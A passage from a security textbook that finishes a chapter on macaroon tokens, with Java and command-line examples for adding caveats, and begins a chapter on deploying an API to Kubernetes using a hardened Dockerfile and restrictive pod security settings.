var verifier = new MacaroonsVerifier(macaroon);
verifier.satisfyGeneral(new TimestampCaveatVerifier());
verifier.satisfyExact("method = " + request.requestMethod());
verifier.satisfyGeneral(new SinceVerifier(request));
ADDING CAVEATS
To add a caveat to a macaroon, you can parse it using the MacaroonsBuilder class and
then use the add_first_party_caveat method to append caveats, as shown in list-
ing 9.18. The listing is a standalone command-line program for adding caveats to a
Listing 9.17
A custom caveat verifier
Check the
caveat matches
and parse the
restriction.
Determine the
“since” parameter
value on the request.
Satisfy the caveat if the
request is after the earliest
message restriction.
Reject all
other caveats.
327
Macaroons: Tokens with caveats
macaroon. It first parses the macaroon, which is passed as the first argument to the
program, and then loops through any remaining arguments treating them as caveats.
Finally, it prints out the resulting macaroon as a string again. Navigate to the src/main/
java/com/manning/apisecurityinaction folder and create a new file named Caveat-
Appender.java and type in the contents of the listing.
package com.manning.apisecurityinaction;
import com.github.nitram509.jmacaroons.MacaroonsBuilder;
import static com.github.nitram509.jmacaroons.MacaroonsBuilder.deserialize;
public class CaveatAppender {
public static void main(String... args) {
var builder = new MacaroonsBuilder(deserialize(args[0]));
for (int i = 1; i < args.length; ++i) {
var caveat = args[i];
builder.add_first_party_caveat(caveat);
}
System.out.println(builder.getMacaroon().serialize());
}
}
IMPORTANT
Compared to the server, the client needs only a few lines of code
to append caveats and doesn’t need to store any secret keys.
To test out the program, use the Natter API to create a new social space and receive a
capability URI with a macaroon token. In this example, I’ve used the jq and cut utili-
ties to extract the macaroon token, but you can manually copy and paste if you prefer:
MAC=$(curl -u demo:changeit -H 'Content-Type: application/json' \
-d '{"owner":"demo","name":"test"}' \
https://localhost:4567/spaces | jq -r '.["messages-rw"]' \
| cut -d= -f2)
You can then append a caveat, for example setting the expiry time a minute or so into
the future:
NEWMAC=$(mvn -q exec:java \
-Dexec.mainClass= com.manning.apisecurityinaction.CaveatAppender \
-Dexec.args="$MAC 'time < 2020-08-03T12:05:00Z'")
You can then use this new macaroon to read any messages in the space until it expires:
curl -u demo:changeit -i \
"https://localhost:4567/spaces/1/messages?access_token=$NEWMAC"
After the new time limit expires, the request will return a 403 Forbidden error, but the
original token will still work (just change $NEWMAC to $MAC in the query to test this).
Listing 9.18
Appending caveats
Parse the macaroon and
create a MacaroonsBuilder.
Add each caveat to
the macaroon.
Serialize the macaroon
back into a string.
328
CHAPTER 9
Capability-based security and macaroons
This demonstrates the core advantage of macaroons: once you’ve configured the
server it’s very easy (and fast) for a client to append contextual caveats that restrict the
use of a token, protecting those tokens in case of compromise. A JavaScript client run-
ning in a web browser can use a JavaScript macaroon library to easily append caveats
every time it uses a token with just a few lines of code.
9.3.4
Third-party caveats
First-party caveats provide considerable flexibility and security improvements over tra-
ditional tokens on their own, but macaroons also allow third-party caveats that are ver-
ified by an external service. Rather than the API verifying a third-party caveat directly,
the client instead must contact the third-party service itself and obtain a discharge mac-
aroon that proves that the condition is satisfied. The two macaroons are cryptographi-
cally tied together so that the API can verify that the condition is satisfied without
talking directly to the third-party service.
DEFINITION
A discharge macaroon is obtained by a client from a third-party ser-
vice to prove that a third-party caveat is satisfied. A third-party service is any
service that isn’t the client or the server it is trying to access. The discharge
macaroon is cryptographically bound to the original macaroon such that the
API can ensure that the condition has been satisfied without talking directly
to the third-party service.
Third-party caveats provide the basis for loosely coupled decentralized authorization
and provide some interesting properties:
The API doesn’t need to directly communicate with the third-party service.
No details about the query being answered by the third-party service are dis-
closed to the client. This can be important if the query contains personal infor-
mation about a user.
The discharge macaroon proves that the caveat is satisfied without revealing any
details to the client or the API.
Because the discharge macaroon is itself a macaroon, the third-party service
can attach additional caveats to it that the client must satisfy before it is granted
access, including further third-party caveats.
For example, a client might be issued with a long-term macaroon token to performing
banking activities on behalf of a user, such as initiating payments from their account. As
well as first-party caveats restricting how much the client can transfer in a single trans-
action, the bank might attach a third-party caveat that requires the client to obtain
authorization for each payment from a transaction authorization service. The transac-
tion authorization service checks the details of the transaction and potentially con-
firms the transaction directly with the user before issuing a discharge macaroon tied
to that one transaction. This pattern of having a single long-lived token providing gen-
eral access, but then requiring short-lived discharge macaroons to authorize specific
transactions is a perfect use case for third-party caveats.
329
Macaroons: Tokens with caveats
CREATING THIRD-PARTY CAVEATS
Unlike a first-party caveat, which is a simple string, a third-party caveat has three com-
ponents:
A location hint telling the client where to locate the third-party service.
A unique unguessable secret string, which will be used to derive a new HMAC
key that the third-party service will use to sign the discharge macaroon.
An identifier for the caveat that the third-party can use to identify the query.
This identifier is public and so shouldn’t reveal the secret.
To add a third-party caveat to a macaroon, you use the add_third_party_caveat
method on the MacaroonsBuilder object:
macaroon = MacaroonsBuilder.modify(macaroon)
.add_third_party_caveat("https://auth.example.com",
secret, caveatId)
.getMacaroon();
The unguessable secret should be generated with high entropy, such as a 256-bit value
from a SecureRandom:
var key = new byte[32];
new SecureRandom().nextBytes(key);
var secret = Base64.getEncoder().encodeToString(key);
When you add a third-party caveat to a macaroon, this secret is encrypted so that only
the API that verifies the macaroon will be able to decrypt it. The party appending the
caveat also needs to communicate the secret and the query to be verified to the third-
party service. There are two ways to accomplish this, with different trade-offs:
The caveat appender can encode the query and the secret into a message and
encrypt it using a public key from the third-party service. The encrypted value is
then used as the identifier for the third-party caveat. The third-party can then
decrypt the identifier to discover the query and secret. The advantage of this
approach is that the API doesn’t need to directly talk to the third-party service,
but the encrypted identifier may be quite large.
Alternatively, the caveat appender can contact the third-party service directly
(via a REST API, for example) to register the caveat and secret. The third-party
service would then store these and return a random value (known as a ticket)
that can be used as the caveat identifier. When the client presents the identifier
to the third-party it can look up the query and secret in its local storage based
on the ticket. This solution is likely to produce smaller identifiers, but at the
cost of additional network requests and storage at the third-party service.
There’s currently no standard for either of these two options describing what the API
for registering a caveat would look like for the second option, or which public key
encryption algorithm and message format would be used for the first. There is also no
Modify an existing
macaroon to add a caveat.
Add the third-
party caveat.
330
CHAPTER 9
Capability-based security and macaroons
standard describing how a client presents the caveat identifier to the third-party ser-
vice. In practice, this limits the use of third-party caveats because client developers
need to know how to integrate with each service individually, so they are typically only
used within a closed ecosystem.
Answers to pop quiz questions
1
a, e, f, or g are all acceptable places to encode the token. The others are likely
to interfere with the functioning of the URI.
2
c, d, and e.
3
b and e would prevent tokens filling up the database. Using a more scalable
database is likely to just delay this (and increase your costs).
4
e. Without returning links, a client has no way to create URIs to other resources.
5
d. If the server redirects, the browser will copy the fragment to the new URL
unless a new one is specified. This can leak the token to other servers. For
example, if you redirect the user to an external login service, the fragment com-
ponent is not sent to the server and is not included in Referer headers.
6
a and d.
7
b, c, and e.
Summary
Capability URIs can be used to provide fine-grained access to individual resources
via your API. A capability URI combines an identifier for a resource along with
a set of permissions to access that resource.
As an alternative to identity-based access control, capabilities avoid ambient
authority that can lead to confused deputy attacks and embrace POLA.
Pop quiz
6
Which of the following apply to a first-party caveat? Select all that apply.
a
It’s a simple string.
b
It’s satisfied using a discharge macaroon.
c
It requires the client to contact another service.
d
It can be checked at the point of use by the API.
e
It has an identifier, a secret string, and a location hint.
7
Which of the following apply to a third-party caveat? Select all that apply.
a
It’s a simple string.
b
It’s satisfied using a discharge macaroon.
c
It requires the client to contact another service.
d
It can be checked at the point of use by the API.
e
It has an identifier, a secret string, and a location hint.
331
Summary
There are many ways to form capability URIs that have different trade-offs. The
simplest forms encode a random token into the URI path or query parameters.
More secure variants encode the token into the fragment or userinfo compo-
nents but come at a cost of increased complexity for clients.
Tying a capability URI to a user session increases the security of both, because it
reduces the risk of capability tokens being stolen and can be used to prevent
CSRF attacks. This makes it harder to share capability URIs.
Macaroons allow anybody to restrict a capability by appending caveats that can
be cryptographically verified and enforced by an API. Contextual caveats can be
appended just before a macaroon is used to secure a token against misuse.
First-party caveats encode simple conditions that can be checked locally by an
API, such as restricted the time of day at which a token can be used. Third-party
caveats require the client to obtain a discharge macaroon from an external ser-
vice proving that it satisfies a condition, such that the user is an employee of a
certain company or is over 18 years old.
Part 4
Microservice APIs
in Kubernetes
The Kubernetes project has exploded in popularity in recent years as the
preferred environment for deploying server software. That growth has been
accompanied by a shift to microservice architectures, in which complex applica-
tions are split into separate components communicating over service-to-service
APIs. In this part of the book, you’ll see how to deploy microservice APIs in
Kubernetes and secure them from threats.
Chapter 10 is a lightning tour of Kubernetes and covers security best prac-
tices for deploying services in this environment. You’ll look at preventing com-
mon attacks against internal APIs and how to harden the environment against
attackers.
After hardening the environment, chapter 11 discusses approaches to
authentication in service-to-service API calls. You’ll see how to use JSON Web
Tokens and OAuth2 and how to harden these approaches in combination with
mutual TLS authentication. The chapter concludes by looking at patterns for
end-to-end authorization when a single user API request triggers multiple inter-
nal API calls between microservices.
335
Microservice APIs
in Kubernetes
In the chapters so far, you have learned how to secure user-facing APIs from a vari-
ety of threats using security controls such as authentication, authorization, and
rate-limiting. It’s increasingly common for applications to themselves be structured
as a set of microservices, communicating with each other using internal APIs intended
to be used by other microservices rather than directly by users. The example in fig-
ure 10.1 shows a set of microservices implementing a fictional web store. A single
user-facing API provides an interface for a web application, and in turn, calls sev-
eral backend microservices to handle stock checks, process payment card details,
and arrange for products to be shipped once an order is placed.
DEFINITION
A microservice is an independently deployed service that is a
component of a larger application. Microservices are often contrasted with
This chapter covers
Deploying an API to Kubernetes
Hardening Docker container images
Setting up a service mesh for mutual TLS
Locking down the network using network policies
Supporting external clients with an ingress
controller
336
CHAPTER 10
Microservice APIs in Kubernetes
monoliths, where all the components of an application are bundled into a sin-
gle deployed unit. Microservices communicate with each other using APIs
over a protocol such as HTTP.
Some microservices may also need to call APIs provided by external services, such as a
third-party payment processor. In this chapter, you’ll learn how to securely deploy
microservice APIs as Docker containers on Kubernetes, including how to harden con-
tainers and the cluster network to reduce the risk of compromise, and how to run TLS
at scale using Linkerd (https://linkerd.io) to secure microservice API communications.
10.1
Microservice APIs on Kubernetes
Although the concepts in this chapter are applicable to most microservice deploy-
ments, in recent years the Kubernetes project (https://kubernetes.io) has emerged as
a leading approach to deploying and managing microservices in production. To keep
Users
Stock
Authentication
Inventory
Shipping
Payment
processing
Web frontend
API
Frontend services may call
many backend services.
Each backend service may
have a different database.
Some microservices may
call external APIs to get
their jobs done.
Figure 10.1
In a microservices architecture, a single application is broken into loosely
coupled services that communicate using remote APIs. In this example, a fictional web
store has an API for web clients that calls to internal services to check stock levels,
process payments, and arrange shipping when an order is placed.
337
Microservice APIs on Kubernetes
things concrete, you’ll use Kubernetes to deploy the examples in this part of the book.
Appendix B has detailed instructions on how to set up the Minikube environment for
running Kubernetes on your development machine. You should follow those instruc-
tions now before continuing with the chapter.
The basic concepts of Kubernetes relevant to deploying an API are shown in fig-
ure 10.2. A Kubernetes cluster consists of a set of nodes, which are either physical or
virtual machines (VMs) running the Kubernetes software. When you deploy an app to
the cluster, Kubernetes replicates the app across nodes to achieve availability and scal-
ability requirements that you specify. For example, you might specify that you always
require at least three copies of your app to be running, so that if one fails the other
two can handle the load. Kubernetes ensures these availability goals are always satis-
fied and redistributing apps as nodes are added or removed from the cluster. An app
is implemented by one or more pods, which encapsulate the software needed to run
that app. A pod is itself made up of one or more Linux containers, each typically run-
ning a single process such as an HTTP API server.
DEFINITION
A Kubernetes node is a physical or virtual machine that forms part
of the Kubernetes cluster. Each node runs one or more pods that implement
Node
Node
Pod
Pod
Pod
Container
Container
Container
Container
Container
Service A
Service B
A node is a machine that can
run containers. It might be a
physical machine or a VM.
A service is implemented by a
collection of pods, all running
the same containers.
Related containers are
grouped together into pods.
A container is typically
a single process.
Figure 10.2
In Kubernetes, an app is implemented by one or more identical pods
running on physical or virtual machines known as nodes. A pod itself is a collection
of Linux containers, each of which typically has a single process running within it,
such as an API server.
338
CHAPTER 10
Microservice APIs in Kubernetes
apps running on the cluster. A pod is itself a collection of Linux containers and
each container runs a single process such as an HTTP server.
A Linux container is the name given to a collection of technologies within the Linux
operating system that allow a process (or collection of processes) to be isolated from
other processes so that it sees its own view of the file system, network, users, and other
shared resources. This simplifies packaging and deployment, because different pro-
cesses can use different versions of the same components, which might otherwise
cause conflicts. You can even run entirely different distributions of Linux within con-
tainers simultaneously on the same operating system kernel. Containers also provide
security benefits, because processes can be locked down within a container such that it
is much harder for an attacker that compromises one process to break out of the con-
tainer and affect other processes running in different containers or the host operating
system. In this way, containers provide some of the benefits of VMs, but with lower
overhead. Several tools for packaging Linux containers have been developed, the
most famous of which is Docker (https://www.docker.com), which many Kubernetes
deployments build on top of.
LEARN ABOUT IT
Securing Linux containers is a complex topic, and we’ll
cover only the basics of in this book. The NCC Group have published a freely
available 123-page guide to hardening containers at http://mng.bz/wpQQ.
In most cases, a pod should contain only a single main container and that container
should run only a single process. If the process (or node) dies, Kubernetes will restart
the pod automatically, possibly on a different node. There are two general exceptions
to the one-container-per-pod rule:
An init container runs before any other containers in the pod and can be used to
perform initialization tasks, such as waiting for other services to become avail-
able. The main container in a pod will not be started until all init containers
have completed.
A sidecar container runs alongside the main container and provides additional
services. For example, a sidecar container might implement a reverse proxy for
an API server running in the main container, or it might periodically update
data files on a filesystem shared with the main container.
For the most part, you don’t need to worry about these different kinds of containers in
this chapter and can stick to the one-container-per-pod rule. You’ll see an example of
a sidecar container when you learn about the Linkerd service mesh in section 10.3.2.
A Kubernetes cluster can be highly dynamic with pods being created and destroyed
or moved from one node to another to achieve performance and availability goals. This
makes it challenging for a container running in one pod to call an API running in
another pod, because the IP address may change depending on what node (or nodes) it
happens to be running on. To solve this problem, Kubernetes has the concept of a ser-
vice, which provides a way for pods to find other pods within the cluster. Each service
339
Deploying Natter on Kubernetes
running within Kubernetes is given a unique virtual IP address that is unique to that ser-
vice, and Kubernetes keeps track of which pods implement that service. In a microser-
vice architecture, you would register each microservice as a separate Kubernetes service.
A process running in a container can call another microservice’s API by making a net-
work request to the virtual IP address corresponding to that service. Kubernetes will
intercept the request and redirect it to a pod that implements the service.
DEFINITION
A Kubernetes service provides a fixed virtual IP address that can
be used to send API requests to microservices within the cluster. Kubernetes
will route the request to a pod that implements the service.
As pods and nodes are created and deleted, Kubernetes updates the service metadata
to ensure that requests are always sent to an available pod for that service. A DNS ser-
vice is also typically running within a Kubernetes cluster to convert symbolic names for
services, such as payments.myapp.svc.example.com, into its virtual IP address, such as
192.168.0.12. This allows your microservices to make HTTP requests to hard-coded
URIs and rely on Kubernetes to route the request to an appropriate pod. By default,
services are accessible internally only within the Kubernetes network, but you can also
publish a service to a public IP address either directly or using a reverse proxy or load
balancer. You’ll learn how to deploy a reverse proxy in section 10.4.
10.2
Deploying Natter on Kubernetes
In this section, you’ll learn how to deploy a real API into Kubernetes and how to con-
figure pods and services to allow microservices to talk to each other. You’ll also add a
new link-preview microservice as an example of securing microservice APIs that are
not directly accessible to external users. After describing the new microservice, you’ll
use the following steps to deploy the Natter API to Kubernetes:
1
Building the H2 database as a Docker container.
2
Deploying the database to Kubernetes.
3
Building the Natter API as a Docker container and deploying it.
Pop quiz
1
A Kubernetes pod contains which one of the following components?
a
Node
b
Service
c
Container
d
Service mesh
e
Namespace
2
True or False: A sidecar container runs to completion before the main container
starts.
The answers are at the end of the chapter.
340
CHAPTER 10
Microservice APIs in Kubernetes
4
Building the new link-preview microservice.
5
Deploying the new microservice and exposing it as a Kubernetes service.
6
Adjusting the Natter API to call the new microservice API.
You’ll then learn how to avoid common security vulnerabilities that the link-preview
microservice introduces and harden the network against common attacks. But first
let’s motivate the new link-preview microservice.
You’ve noticed that many Natter users are using the app to share links with each
other. To improve the user experience, you’ve decided to implement a feature to gener-
ate previews for these links. You’ve designed a new microservice that will extract links
from messages and fetch them from the Natter servers to generate a small preview based
on the metadata in the HTML returned from the link, making use of any Open Graph
tags in the page (https://ogp.me). For now, this service will just look for a title, descrip-
tion, and optional image in the page metadata, but in future you plan to expand the ser-
vice to handle fetching images and videos. You’ve decided to deploy the new link-
preview API as a separate microservice, so that an independent team can develop it.
Figure 10.3 shows the new deployment, with the existing Natter API and database
joined by the new link-preview microservice. Each of the three components is imple-
mented by a separate group of pods, which are then exposed internally as three
Kubernetes services:
The H2 database runs in one pod and is exposed as the natter-database-service.
The link-preview microservice runs in another pod and provides the natter-link-
preview-service.
The main Natter API runs in yet another pod and is exposed as the natter-
api-service.
Natter
database
Link-preview
service
Natter API
The link-preview service generates
previews by fetching any URLs found
within Natter messages.
All other functions are handled by the
original Natter API and database.
Services are deployed
as separate pods.
apple.com
manning.com
google.com
Figure 10.3
The link-preview API is
developed and deployed as a new
microservice, separate from the main
Natter API and running in different pods.
341
Deploying Natter on Kubernetes
You’ll use a single pod for each service in this chapter, for simplicity, but Kubernetes
allows you to run multiple copies of a pod on multiple nodes for performance and
reliability: if a pod (or node) crashes, it can then redirect requests to another pod
implementing the same service.
Separating the link-preview service from the main Natter API also has security ben-
efits, because fetching and parsing arbitrary content from the internet is potentially
risky. If this was done within the main Natter API process, then any mishandling of
those requests could compromise user data or messages. Later in the chapter you’ll
see examples of attacks that can occur against this link-preview API and how to lock
down the environment to prevent them causing any damage. Separating potentially
risky operations into their own environments is known as privilege separation.
DEFINITION
Privilege separation is a design technique based on extracting poten-
tially risky operations into a separate process or environment that is isolated
from the main process. The extracted process can be run with fewer privi-
leges, reducing the damage if it is ever compromised.
Before you develop the new link-preview service, you’ll get the main Natter API run-
ning on Kubernetes with the H2 database running as a separate service.
10.2.1 Building H2 database as a Docker container
Although the H2 database you’ve used for the Natter API in previous chapters is
intended primarily for embedded use, it does come with a simple server that can be
used for remote access. The first step of running the Natter API on Kubernetes is to
build a Linux container for running the database. There are several varieties of Linux
container; in this chapter, you’ll build a Docker container (as that is the default used
by the Minikube environment) to run Kubernetes on a local developer machine. See
appendix B for detailed instructions on how to install and configure Docker and Mini-
kube. Docker container images are built using a Dockerfile, which is a script that describes
how to build and run the software you need.
DEFINITION
A container image is a snapshot of a Linux container that can be
used to create many identical container instances. Docker images are built in
layers from a base image that specifies the Linux distribution such as Ubuntu
or Debian. Different containers can share the base image and apply differ-
ent layers on top, reducing the need to download and store large images
multiple times.
Because there is no official H2 database Docker file, you can create your own, as
shown in listing 10.1. Navigate to the root folder of the Natter project and create a
new folder named docker and then create a folder inside there named h2. Create a new
file named Dockerfile in the new docker/h2 folder you just created with the contents
of the listing. A Dockerfile consists of the following components:
A base image, which is typically a Linux distribution such as Debian or Ubuntu.
The base image is specified using the FROM statement.
342
CHAPTER 10
Microservice APIs in Kubernetes
A series of commands telling Docker how to customize that base image for your
app. This includes installing software, creating user accounts and permissions,
or setting up environment variables. The commands are executed within a con-
tainer running the base image.
DEFINITION
A base image is a Docker container image that you use as a starting
point for creating your own images. A Dockerfile modifies a base image to install
additional dependencies and configure permissions.
The Dockerfile in the listing downloads the latest release of H2, verifies its SHA-256
hash to ensure the file hasn’t changed, and unpacks it. The Dockerfile uses curl to
download the H2 release and sha256sum to verify the hash, so you need to use a base
image that includes these commands. Docker runs these commands in a container
running the base image, so it will fail if these commands are not available, even if you
have curl and sha256sum installed on your development machine.
To reduce the size of the final image and remove potentially vulnerable files, you
can then copy the server binaries into a different, minimal base image. This is known
as a Docker multistage build and is useful to allow the build process to use a full-featured
image while the final image is based on something more stripped-down. This is done
in listing 10.1 by adding a second FROM command to the Dockerfile, which causes
Docker to switch to the new base image. You can then copy files from the build image
using the COPY --from command as shown in the listing.
DEFINITION
A Docker multistage build allows you to use a full-featured base
image to build and configure your software but then switch to a stripped-
down base image to reduce the size of the final image.
In this case, you can use Google’s distroless base image, which contains just the Java 11
runtime and its dependencies and nothing else (not even a shell). Once you’ve cop-
ied the server files into the base image, you can then expose port 9092 so that the
server can be accessed from outside the container and configure it to use a non-root
user and group to run the server. Finally, define the command to run to start the
server using the ENTRYPOINT command.
TIP
Using a minimal base image such as the Alpine distribution or Google’s
distroless images reduces the attack surface of potentially vulnerable software
and limits further attacks that can be carried out if the container is ever com-
promised. In this case, an attacker would be quite happy to find curl on a
compromised container, but this is missing from the distroless image as is
almost anything else they could use to further an attack. Using a minimal
image also reduces the frequency with which you’ll need to apply security
updates to patch known vulnerabilities in the distribution because the vulner-
able components are not present.
343
Deploying Natter on Kubernetes
FROM curlimages/curl:7.66.0 AS build-env
ENV RELEASE h2-2018-03-18.zip
ENV SHA256 \
a45e7824b4f54f5d9d65fb89f22e1e75ecadb15ea4dcf8c5d432b80af59ea759
WORKDIR /tmp
RUN echo "$SHA256 $RELEASE" > $RELEASE.sha256 && \
curl -sSL https://www.h2database.com/$RELEASE -o $RELEASE && \
sha256sum -b -c $RELEASE.sha256 && \
unzip $RELEASE && rm -f $RELEASE
FROM gcr.io/distroless/java:11
WORKDIR /opt
COPY --from=build-env /tmp/h2/bin /opt/h2
USER 1000:1000
EXPOSE 9092
ENTRYPOINT ["java", "-Djava.security.egd=file:/dev/urandom", \
"-cp", "/opt/h2/h2-1.4.197.jar", \
"org.h2.tools.Server", "-tcp", "-tcpAllowOthers"]
Listing 10.1
The H2 database Dockerfile
Linux users and UIDs
When you log in to a Linux operating system (OS) you typically use a string username
such as “guest” or “root.” Behind the scenes, Linux maps these usernames into 32-
bit integer UIDs (user IDs). The same happens with group names, which are mapped
to integer GIDs (group IDs). The mapping between usernames and UIDs is done by
the /etc/passwd file, which can differ inside a container from the host OS. The root
user always has a UID of 0. Normal users usually have UIDs starting at 500 or 1000.
All permissions to access files and other resources are determined by the operating
system in terms of UIDs and GIDs rather than user and group names, and a process
can run with a UID or GID that doesn’t correspond to any named user or group.
By default, UIDs and GIDs within a container are identical to those in the host. So UID
0 within the container is the same as UID 0 outside the container: the root user. If you
run a process inside a container with a UID that happens to correspond to an existing
user in the host OS, then the container process will inherit all the permissions of that
user on the host. For added security, your Docker images can create a new user and
group and let the kernel assign an unused UID and GID without any existing permis-
sions in the host OS. If an attacker manages to exploit a vulnerability to gain access to
the host OS or filesystem, they will have no (or very limited) permissions.
A Linux user namespace can be used to map UIDs within the container to a different
range of UIDs on the host. This allows a process running as UID 0 (root) within a
container to be mapped to a non-privileged UID such as 20000 in the host. As far as
the container is concerned, the process is running as root, but it would not have root
Define environment variables
for the release file and hash.
Download
the release
and verify
the SHA-
256 hash.
Unzip the download and
delete the zip file.
Copy the binary
files into a minimal
container image.
Ensure the process runs as
a non-root user and group.
Expose the
H2 default
TCP port.
Configure the
container to run
the H2 server.
344
CHAPTER 10
Microservice APIs in Kubernetes
When you build a Docker image, it gets cached by the Docker daemon that runs the
build process. To use the image elsewhere, such as within a Kubernetes cluster, you
must first push the image to a container repository such as Docker Hub (https://
hub.docker.com) or a private repository within your organization. To avoid having to
configure a repository and credentials in this chapter, you can instead build directly to
the Docker daemon used by Minikube by running the following commands in your
terminal shell. You should specify version 1.16.2 of Kubernetes to ensure compatibility
with the examples in this book. Some of the examples require Minikube to be run-
ning with at least 4GB of RAM, so use the --memory flag to specify that.
minikube start \
--kubernetes-version=1.16.2 \
--memory=4096
You should then run
eval $(minikube docker-env)
so that any subsequent Docker commands in the same console instance will use Mini-
kube’s Docker daemon. This ensures Kubernetes will be able to find the images with-
out needing to access an external repository. If you open a new terminal window,
make sure to run this command again to set the environment correctly.
LEARN ABOUT IT
Typically in a production deployment, you’d configure your
DevOps pipeline to automatically push Docker images to a repository after
they have been thoroughly tested and scanned for known vulnerabilities.
Setting up such a workflow is outside the scope of this book but is covered
in detail in Securing DevOps by Julien Vehent (Manning, 2018; http://mng
.bz/qN52).
You can now build the H2 Docker image by typing the following commands in the
same shell:
cd docker/h2
docker build -t apisecurityinaction/h2database .
This may take a long time to run the first time because it must download the base
images, which are quite large. Subsequent builds will be faster because the images are
(continued)
privileges if it ever broke out of the container to access the host. See https://docs
.docker.com/engine/security/userns-remap/ for how to enable a user namespace in
Docker. This is not yet possible in Kubernetes, but there are several alternative options
for reducing user privileges inside a pod that are discussed later in the chapter.
Enable the latest
Kubernetes version.
Specify 4GB of RAM.
345
Deploying Natter on Kubernetes
cached locally. To test the image, you can run the following command and check that
you see the expected output:
$ docker run apisecurityinaction/h2database
TCP server running at tcp://172.17.0.5:9092 (others can connect)
If you want to stop the container press Ctrl-C.
TIP
If you want to try connecting to the database server, be aware that the IP
address displayed is for Minikube’s internal virtual networking and is usually
not directly accessible. Run the command minikube ip at the prompt to get
an IP address you can use to connect from the host OS.
10.2.2 Deploying the database to Kubernetes
To deploy the database to the Kubernetes cluster, you’ll need to create some configu-
ration files describing how it is to be deployed. But before you do that, an important
first step is to create a separate Kubernetes namespace to hold all pods and services
related to the Natter API. A namespace provides a level of isolation when unrelated
services need to run on the same cluster and makes it easier to apply other security
policies such as the networking policies that you’ll apply in section 10.3. Kubernetes
provides several ways to configure objects in the cluster, including namespaces, but it’s
a good idea to use declarative configuration files so that you can check these into Git
or another version-control system, making it easier to review and manage security con-
figuration over time. Listing 10.2 shows the configuration needed to create a new
namespace for the Natter API. Navigate to the root folder of the Natter API project
and create a new sub-folder named “kubernetes.” Then inside the folder, create a new
file named natter-namespace.yaml with the contents of listing 10.2. The file tells
Kubernetes to make sure that a namespace exists with the name natter-api and a
matching label.
WARNING
YAML (https://yaml.org) configuration files are sensitive to inden-
tation and other whitespace. Make sure you copy the file exactly as it is in the
listing. You may prefer to download the finished files from the GitHub repos-
itory accompanying the book (http://mng.bz/7Gly).
apiVersion: v1
kind: Namespace
metadata:
name: natter-api
labels:
name: natter-api
NOTE
Kubernetes configuration files are versioned using the apiVersion
attribute. The exact version string depends on the type of resource and version
of the Kubernetes software you’re using. Check the Kubernetes documentation
Listing 10.2
Creating the namespace
Use the Namespace kind
to create a namespace.
Specify a name
and label for the
namespace.
346
CHAPTER 10
Microservice APIs in Kubernetes
(https://kubernetes.io/docs/home/) for the correct apiVersion when writ-
ing a new configuration file.
To create the namespace, run the following command in your terminal in the root
folder of the natter-api project:
kubectl apply -f kubernetes/natter-namespace.yaml
The kubectl apply command instructs Kubernetes to make changes to the cluster to
match the desired state specified in the configuration file. You’ll use the same com-
mand to create all the Kubernetes objects in this chapter. To check that the name-
space is created, use the kubectl get namespaces command:
$ kubectl get namespaces
Your output will look similar to the following:
NAME STATUS AGE
default Active 2d6h
kube-node-lease Active 2d6h
kube-public Active 2d6h
kube-system Active 2d6h
natter-api Active 6s
You can now create the pod to run the H2 database container you built in the last sec-
tion. Rather than creating the pod directly, you’ll instead create a deployment, which
describes which pods to run, how many copies of the pod to run, and the security attri-
butes to apply to those pods. Listing 10.3 shows a deployment configuration for the
H2 database with a basic set of security annotations to restrict the permissions of the
pod in case it ever gets compromised. First you define the name and namespace to
run the deployment in, making sure to use the namespace that you defined earlier. A
deployment specifies the pods to run by using a selector that defines a set of labels that
matching pods will have. In listing 10.3, you define the pod in the template section of
the same file, so make sure the labels are the same in both parts.
NOTE
Because you are using an image that you built directly to the Minikube
Docker daemon, you need to specify imagePullPolicy: Never in the con-
tainer specification to prevent Kubernetes trying to pull the image from a
repository. In a real deployment, you would have a repository, so you’d
remove this setting.
You can also specify a set of standard security attributes in the securityContext section
for both the pod and for individual containers, as shown in the listing. In this case, the
definition ensures that all containers in the pod run as a non-root user, and that it is not
possible to bypass the default permissions by setting the following properties:
runAsNonRoot: true ensures that the container is not accidentally run as the
root user. The root user inside a container is the root user on the host OS and
can sometimes escape from the container.
347
Deploying Natter on Kubernetes
allowPrivilegeEscalation: false ensures that no process run inside the con-
tainer can have more privileges than the initial user. This prevents the con-
tainer executing files marked with set-UID attributes that run as a different
user, such as root.
readOnlyRootFileSystem: true makes the entire filesystem inside the container
read-only, preventing an attacker from altering any system files. If your container
needs to write files, you can mount a separate persistent storage volume.
capabilities: drop: - all removes all Linux capabilities assigned to the container.
This ensures that if an attacker does gain root access, they are severely limited in
what they can do. Linux capabilities are subsets of full root privileges and are
unrelated to the capabilities you used in chapter 9.
LEARN ABOUT IT
For more information on configuring the security context of a
pod, refer to http://mng.bz/mN12. In addition to the basic attributes specified
here, you can enable more advanced sandboxing features such as AppArmor,
SELinux, or seccomp. These features are beyond the scope of this book. A start-
ing point to learn more is the Kubernetes Security Best Practices talk given by Ian Lewis
at Container Camp 2018 (https://www.youtube.com/watch?v=v6a37uzFrCw).
Create a file named natter-database-deployment.yaml in the kubernetes folder with
the contents of listing 10.3 and save the file.
apiVersion: apps/v1
kind: Deployment
metadata:
name: natter-database-deployment
namespace: natter-api
spec:
selector:
matchLabels:
app: natter-database
replicas: 1
template:
metadata:
labels:
app: natter-database
spec:
securityContext:
runAsNonRoot: true
containers:
- name: natter-database
image: apisecurityinaction/h2database:latest
imagePullPolicy: Never
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
capabilities:
drop:
- all
Listing 10.3
The database deployment
Give the deployment a
name and ensure it
runs in the natter-api
namespace.
Select which
pods are in the
deployment.
Specify
how many
copies of
the pod to
run on the
cluster.
Specify a security
context to limit
permissions inside
the containers.
Tell Kubernetes the
name of the Docker
image to run.
Ensure that
Kubernetes uses the
local image rather
than trying to pull one
from a repository.
348
CHAPTER 10
Microservice APIs in Kubernetes
ports:
- containerPort: 9092
Run kubectl apply -f kubernetes/natter-database-deployment.yaml in the natter-
api root folder to deploy the application.
To check that your pod is now running, you can run the following command:
$ kubectl get deployments --namespace=natter-api
This will result in output like the following:
NAME READY UP-TO-DATE AVAILABLE AGE
natter-database-deployment 1/1 1 1 10s
You can then check on individual pods in the deployment by running the following
command
$ kubectl get pods --namespace=natter-api
which outputs a status report like this one, although the pod name will be different
because Kubernetes generates these randomly:
NAME READY STATUS RESTARTS AGE
natter-database-deployment-8649d65665-d58wb 1/1 Running 0 16s
Although the database is now running in a pod, pods are designed to be ephemeral
and can come and go over the lifetime of the cluster. To provide a stable reference for
other pods to connect to, you need to also define a Kubernetes service. A service pro-
vides a stable internal IP address and DNS name that other pods can use to connect to
the service. Kubernetes will route these requests to an available pod that implements
the service. Listing 10.4 shows the service definition for the database.
